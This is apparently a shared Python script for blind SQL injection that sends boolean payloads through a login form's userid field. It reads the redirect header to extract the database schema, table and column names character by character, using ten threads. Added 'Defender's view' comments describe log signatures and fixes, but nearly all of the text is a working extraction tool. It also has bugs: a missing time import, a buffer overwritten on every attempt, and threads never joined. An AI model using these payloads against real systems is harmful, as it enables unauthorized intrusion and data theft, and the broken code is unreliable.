Created
May 29, 2019 06:35
Part of a set of scripting tools for SQL injection; hell fire can burn anything.
import requests, string, sys, threading | |
# Endpoint that every request in this script is POSTed to. example.com is a
# reserved documentation domain, so the value shown here is a placeholder.
url = 'http://example.com/any.php'
def inline_print(value):
    """Redraw *value* in place on the current terminal line.

    The text is converted with str(); the cursor is moved back by its length
    with backspaces, the same width is blanked with spaces, the cursor is
    moved back again, and the text is written. stdout is flushed at the end
    so the update is visible immediately.
    """
    text = str(value)
    rewind = "\b" * len(text)
    blank = " " * len(text)
    # Same four writes as a manual sequence: rewind, erase, rewind, draw.
    for piece in (rewind, blank, rewind, text):
        sys.stdout.write(piece)
    sys.stdout.flush()
def get_length(payload):
    """Probe the length of a SQL sub-query result through a yes/no oracle.

    For each candidate length from 1 to 999 the function POSTs a form to
    ``url`` whose ``userid`` field carries a ``length((payload)) = N``
    condition, and reads the ``Location`` response header. A value of
    ``'user'`` is treated as "condition true".

    Returns the first candidate that produced that redirect, or 0 when none
    of the 999 candidates did. Nothing in the visible script calls this
    function.

    Defender's view: the oracle only exists if the endpoint concatenates the
    ``userid`` field into its SQL text; binding it as a query parameter
    removes it. In request logs this shows up as a run of POSTs from one
    client whose ``userid`` values differ only in the trailing integer.
    """
    for length_guess in range(1, 1000):
        params = {
            # Injected boolean condition; "password" is a fixed filler value.
            "userid": "-2547' OR length(({})) = {} -- XpQG".format(payload, length_guess),
            "password": "1"
        }
        # Redirects are not followed so the Location header can be inspected.
        res = requests.post(url, params, allow_redirects=False)
        if res.headers['Location'] == 'user':
            return length_guess
            break
    return 0
# Bounds the number of RequestThread workers in flight at ten: brute() acquires
# a slot before starting a worker, and the worker releases it when run() ends.
threadLimiter = threading.BoundedSemaphore(10)
class RequestThread(threading.Thread):
    """Worker thread that tests one character position of a sub-query result.

    Each instance holds the sub-query text (``payload``), a 1-based character
    position (``index``) and a list shared with the caller (``arr``) into
    which it writes at ``index - 1``.

    Defender's view: one worker sends up to 69 POSTs to ``url`` (52 letters,
    10 digits and the 7 extra characters in the loop below), each with a
    ``substring((...), index, 1) = 'c'`` condition in the ``userid`` field.
    That field pattern, repeated with a single character changing, is the
    signature to look for in web or database logs.
    """

    def __init__(self, payload, index, arr, *args, **kwargs):
        """Store the sub-query, the position to test and the shared output list.

        Extra positional and keyword arguments are passed to
        ``threading.Thread.__init__`` unchanged.
        """
        threading.Thread.__init__(self, *args, **kwargs)
        self.payload = payload
        self.index = index
        self.arr = arr

    def run(self):
        """Try each candidate character at ``self.index`` until the oracle matches.

        The semaphore slot taken by the caller is released in ``finally``,
        whether the loop ends by a match, by exhaustion or by an exception.
        """
        try:
            for item in string.ascii_letters + string.digits + "_\n:->< ":
                params = {
                    # Injected comparison of one character of the sub-query result.
                    "userid": "-2547' OR substring(({}), {}, 1) = '{}' -- XpQG".format(self.payload, self.index, item),
                    "password": "1"
                }
                # The loop calls time.sleep(0.02) ahead of every request.
                time.sleep(0.02)
                res = requests.post(url, params, allow_redirects=False)
                # The slot is written on every attempt, so it holds the last
                # character tried whether or not the oracle matched.
                self.arr[self.index-1] = item
                if res.headers['Location'] == 'user': # A "user" redirect is the success signal (seen when testing with the payload 'or 1=1 --)
                    self.arr[self.index-1] = item
                    break
        finally:
            threadLimiter.release()
            sys.exit()
def brute(payload, length_table):
    """Start one RequestThread per character position and return the shared buffer.

    ``arr`` starts as ``length_table`` underscores. A worker is started for
    each position from 1 to ``length_table - 1``; ``threadLimiter.acquire()``
    blocks while ten workers are already running. The function does not call
    ``join()`` on any worker: it returns the joined contents of ``arr`` as
    soon as the last worker has been started.

    Defender's view: a full run is up to ``(length_table - 1) * 69`` POSTs to
    one endpoint, at most ten in parallel, which is the kind of volume that
    per-client rate limiting and anomaly alerts on a login form are meant to
    catch.
    """
    arr = ['_'] * length_table
    for i in range(1, length_table):
        # Blocks here until one of the ten semaphore slots is free.
        threadLimiter.acquire()
        thread = RequestThread(payload, i, arr)
        thread.start()
    return "".join(arr)
# Sub-query that the rest of the script reads out one character at a time.
# It walks information_schema.columns for the current database and builds a
# single string of "schema :: table -> column" entries separated by ":::".
# Defender's view: an application account that cannot read information_schema
# beyond its own needs, and bound parameters on the login query, both blunt
# this; "information_schema" appearing in a form field is a strong log signal.
payload = """(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)
where (table_schema!='information_schema') and (table_schema=database()) and(0x00)in (@a:=concat(@a,':::',table_schema,' :: ',table_name,' -> ',column_name))))a)
""" # The sub-query whose result is extracted from the target database
# Runs brute() over 1000 positions and prints whatever the buffer holds on return.
print(brute(payload, 1000))